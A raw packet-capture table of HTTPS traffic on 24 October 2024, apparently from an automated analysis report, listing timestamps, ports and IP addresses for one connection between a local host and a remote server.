                                                                                    Oct 24, 2024 08:46:06.116820097 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119038105 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119070053 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119086981 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119096041 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119132042 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119143009 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119148016 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119194031 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119199991 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119399071 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119427919 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119445086 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119452000 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119499922 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119537115 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119813919 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119843006 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119865894 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119874001 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.119920969 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.119987965 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.120043039 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.120069981 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.120090008 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.132566929 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.132589102 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.132666111 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.132786989 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.132793903 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.132817984 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.132829905 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.132917881 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.132925034 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.133034945 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.134315014 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.134320974 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.134390116 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.134505987 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.134509087 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.134526014 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.134643078 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.134664059 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.135992050 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.135998011 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.136063099 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.136234045 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.136238098 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.136327028 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.137460947 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.137631893 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.162327051 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.162362099 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.162415981 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.162426949 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.162446976 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.172005892 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.212320089 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.212352037 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.212425947 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.212455034 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.212486029 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.212505102 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.212521076 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.212570906 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.223794937 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.223824024 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.223921061 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.223933935 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224009991 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224039078 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224072933 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.224077940 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224116087 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.224580050 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224606991 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224649906 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.224657059 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.224689007 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.232321978 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.243060112 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243087053 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243206978 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.243217945 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243257999 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243287086 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243324041 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.243330002 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243366003 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.243455887 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243479967 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243516922 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.243524075 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.243556023 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.259790897 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.278249025 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.278285027 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.278318882 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.278342009 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.278357983 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.279237986 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.327826977 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.327861071 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.327946901 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.327965021 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328056097 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328084946 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328250885 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.328259945 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328454018 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328478098 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328511953 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.328520060 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.328543901 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.339878082 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.339907885 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340029001 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.340038061 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340244055 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.340291023 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340315104 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340384007 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.340392113 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340436935 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.340661049 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340694904 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340734959 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.340742111 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.340755939 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.351598024 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.351664066 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.351703882 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.351713896 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.351748943 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.359375954 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.359450102 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.359488964 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.359497070 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.359536886 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.362539053 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.362605095 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.362624884 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.362632036 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.362674952 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.443821907 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.443902016 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.443907976 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.443948030 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.443978071 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.444385052 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444446087 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444448948 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.444469929 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444505930 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.444734097 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444798946 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.444803953 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444828033 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.444865942 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.455416918 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.455441952 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.455488920 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.455504894 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.455517054 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.456121922 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456150055 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456185102 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.456191063 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456212044 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.456825018 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456849098 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456904888 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.456912994 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.456923962 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.457298040 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.457323074 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.457356930 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.457361937 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.457391977 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.467413902 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.467479944 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.467500925 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.467513084 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.467544079 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.475148916 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475223064 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475230932 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.475253105 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475292921 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.475529909 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475594997 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475603104 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.475621939 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.475668907 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559187889 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559225082 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559259892 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559273005 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559302092 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559319973 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559341908 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559379101 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559385061 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559425116 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559577942 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559607029 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559638977 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559644938 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559667110 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559876919 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559900999 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559935093 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.559941053 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.559964895 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571238041 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571278095 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571358919 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571369886 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571413040 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571544886 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571567059 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571604967 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571611881 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571631908 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571909904 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571937084 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.571970940 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.571978092 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.572002888 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.582760096 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.582792044 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.582834005 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.582839966 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.582858086 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.582918882 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.583017111 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.583039045 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.583117008 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.583125114 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.583138943 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.584341049 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.590802908 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.590828896 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.590898037 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.590918064 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.590934992 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.625418901 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.625464916 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.625514030 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.625536919 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.625550032 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.629064083 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675031900 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675065041 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675170898 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675193071 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675230026 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675287008 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675324917 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675338030 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675353050 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675375938 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675438881 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675462008 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675499916 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675507069 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675527096 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675858974 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675884008 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675915003 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.675920963 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.675937891 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687036037 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687083006 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687113047 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687134981 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687150002 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687446117 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687473059 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687504053 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687510967 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687530994 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687758923 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687793970 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687807083 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.687813044 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.687849998 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.698482990 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698508024 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698559046 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.698575020 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698590040 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.698729992 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698756933 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698784113 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.698793888 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.698813915 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.706547022 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.706569910 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.706623077 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.706640005 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.706651926 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.709660053 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.709686995 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.709722042 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.709733009 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.709745884 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.749947071 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.790918112 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.790993929 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.791012049 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.791033030 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.791057110 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.791222095 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.791290045 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.791296005 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.791353941 CEST44349176142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:46:06.791390896 CEST49176443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:46:06.791635036 CEST44349176142.250.186.97192.168.2.22
